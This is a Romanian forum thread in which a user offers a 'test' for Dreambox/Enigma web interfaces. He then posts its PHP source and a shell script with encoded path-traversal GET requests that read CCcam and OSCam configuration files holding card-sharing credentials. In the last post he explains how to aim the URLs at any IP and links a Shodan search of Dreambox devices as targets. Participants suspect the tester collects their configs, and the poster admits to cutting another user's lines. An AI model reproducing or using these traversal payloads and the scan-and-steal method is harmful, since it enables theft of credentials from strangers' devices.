PDA

View Full Version : Enigma1/2 WEBIF VULN TEST



puidezmeu
28-02-14, 23:27
Daca iti apare config-ul de la cccam sau oscam dupa ce apesi pe Submit Query! Blocheaza-ti portul 80 sau schimba-ti imaginea cu una mai noua.
Merge testat doar daca cutia e pe acelasi ip(extern) cu PC ex: pc si dm ies pe net printr-un router si portul 80 are forward catre dm!
TEST AICI!! (http://oscam.infosatelit.org/x.php)

zildan
01-03-14, 00:35
Adica le iei deja configurile cand fac testul?

konstantine
01-03-14, 08:56
Dar daca folosesc un firewall standalone (hardware ,in care by rulles blochez porturile vulnerabile) mai poate exista vreo problema?

puidezmeu
01-03-14, 10:01
Daca folosesti fw sau ai porturile blocate din router nu merge..dar multi au cutia pusa in dmz(probabil de lene sa faca un forward la un port)
Scriptul nu salveaza configurile le face print pe ecran si atat...il foloseste cine vrea....

konstantine
01-03-14, 10:24
Preventiv am firewall hardware,localu' il am indoor asa ca "e grele" Si la net,ies prin 3 routere...Cica prevederea e mama intelepciunii...

http://www.canyouseeme.org/

bennykoo
01-03-14, 17:42
deci daca testu-i negativ,e de bine?

puidezmeu
01-03-14, 21:55
daca nu apare cfg da e de bine...inseamna ca nu te pot arde pe webif..decat pe ssh,telnet,stream daca sunt deschise

djczefre
02-03-14, 12:21
E buna dresa asta (lynk) ? Mie i-mi da eroare!

zildan
02-03-14, 12:31
Am operat-o eu.

djczefre
02-03-14, 12:40
Pana la urma nu inteleg nimica. Deci mai pot face test undeva s-au nu are rost! La mine apare pagine inexistenta! Sunt dupa router .Ro.

S-au @puidezmeu face figuri si cu aceasta metoda de test face prostii adica fura liniile direkt pt. el ? Sincer eu m-am pierdut!

zildan
02-03-14, 13:05
Daca pune sursa aici in clar ii dam drumu.
Ti-ai raspuns singur la intrebari.

puidezmeu
02-03-14, 13:12
ce crezi ca se vede in sursa?
are un shell_exec..la un script..

<?php
echo '
<html>
<body>
<br>BEBELUSUL webif tester beta1 using 5 public webif e x p l o i t s!!!.
<form action="'.htmlentities($_SERVER['PHP_SELF']).'" method="post">
Test your STB: <input type="hidden" name="aaa" value='.$_SERVER['REMOTE_ADDR'].' readonly>
<input type="submit">
</form>
</body>';
if (isset($_POST["aaa"]) && !empty($_POST["aaa"])) {
$host = $_POST['aaa'];
$cmd= "/x/mar/UTILS/webz $host";
$output = shell_exec($cmd);
echo "<pre>$output</pre>";


}
?>




echo "###################### $1 #####################"
/x/mar/UTILS/web1 $1 /var/etc/CCcam.cfg
/x/mar/UTILS/web1 $1 /var/keys/newcamd.list
/x/mar/UTILS/web1 $1 /var/tuxbox/config/oscam.server
/x/mar/UTILS/web1 $1 /var/tuxbox/config/oscam.conf
/x/mar/UTILS/web1 $1 /var/tuxbox/config/newcamd.conf
/x/mar/UTILS/web2 $1 /var/etc/CCcam.cfg
/x/mar/UTILS/web2 $1 /var/keys/newcamd.list
/x/mar/UTILS/web2 $1 /var/tuxbox/config/oscam.server
/x/mar/UTILS/web2 $1 /var/tuxbox/config/oscam.conf
/x/mar/UTILS/web2 $1 /var/tuxbox/config/newcamd.conf
GET http://$1/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fvar%2Fetc% 2FCCcam.cfg
GET http://$1/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fvar%2Fkeys %2Fnewcamd.list
GET http://$1/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Ftuxb ox%2Fconfig%2Foscam.server
GET http://$1/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Ftuxb ox%2Fconfig%2Foscam.conf
GET http://$1/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fvar%2Fkeys %2Fnewcamd.conf
GET http://$1/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fvar%2Ftuxb ox%2Fconfig%2Foscam.server
GET http://$1/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fvar%2Ftuxb ox%2Fconfig%2Foscam.conf


/x/mar/UTILS/web3 $1


web1 web2 web3 sunt exploituri pt webif(le gasiti pe google)
DJ-HU stiu ca crapa pipota in tine de cand ti-am taiat liniile ...dar asta e..testeaza-ti tu cutia la calorifer sau cu un ciocan!
Se poate sterge thread-ul!

zildan
02-03-14, 14:44
Am refacut lynk-ul.

Diablo1
02-03-14, 15:01
Merge

LWP::Protocol::http::Socket: connect: No route to host at /usr/share/perl5/LWP/Protocol/http.pm line 51.
Can't connect to 90.110.192.142:80 (No route to host)

puidezmeu
03-03-14, 12:24
Sa va invat prostii..

GET http://$1/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fvar%2Fetc% 2FCCcam.cfg
GET http://$1/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fvar%2Fkeys %2Fnewcamd.list
GET http://$1/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Ftuxb ox%2Fconfig%2Foscam.server
GET http://$1/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Ftuxb ox%2Fconfig%2Foscam.conf
GET http://$1/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fvar%2Fkeys %2Fnewcamd.conf
GET http://$1/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fvar%2Ftuxb ox%2Fconfig%2Foscam.server
GET http://$1/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fvar%2Ftuxb ox%2Fconfig%2Foscam.conf
Aici se poate inlocui $1 cu IP se baga in explorer(fara GET)..daca vreti sa testati alt ip...
Pentru a testa se poate lua un ip din lista de mai jos....

http://www.shodanhq.com/search?q=dreambox